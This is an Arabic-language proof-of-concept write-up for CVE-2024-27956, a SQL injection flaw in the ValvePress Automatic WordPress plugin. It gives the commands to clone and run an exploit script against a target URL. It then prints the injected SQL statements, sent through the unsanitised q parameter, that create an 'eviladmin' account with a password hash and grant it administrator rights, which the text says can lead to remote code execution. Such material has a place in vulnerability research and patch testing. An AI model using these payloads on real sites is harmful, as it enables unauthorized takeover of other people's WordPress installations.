
PoC لثغرة حقن SQL في CVE-2024-27956
إثبات مفهوم (PoC) لـ CVE-2024-27956، وهي ثغرة حقن SQL في إضافة ValvePress Automatic. تستغل هذه الأداة الثغرة بإنشاء مستخدم في الهدف ومنحه صلاحيات المدير. كون المستخدم مديرًا في ووردبريس يمكن أن يؤدي إلى تنفيذ كود عن بعد (Remote Code Execution).
git clone https://github.com/diego-tella/CVE-2024-27956-RCE/
cd CVE-2024-27956-RCE
python exploit.py http://target.com
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', '[email protected]', 'http://127.0.0.1:8000', '2024-04-30 16:26:43', 0, 'eviladmin')
منح صلاحيات المدير:
q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}
في معامل q، يمكننا تمرير استعلامنا بالكامل ثم يتم تنفيذه.
يتم تنفيذ إدخال المستخدم مباشرة دون أي نوع من القيود أو التعقيم.
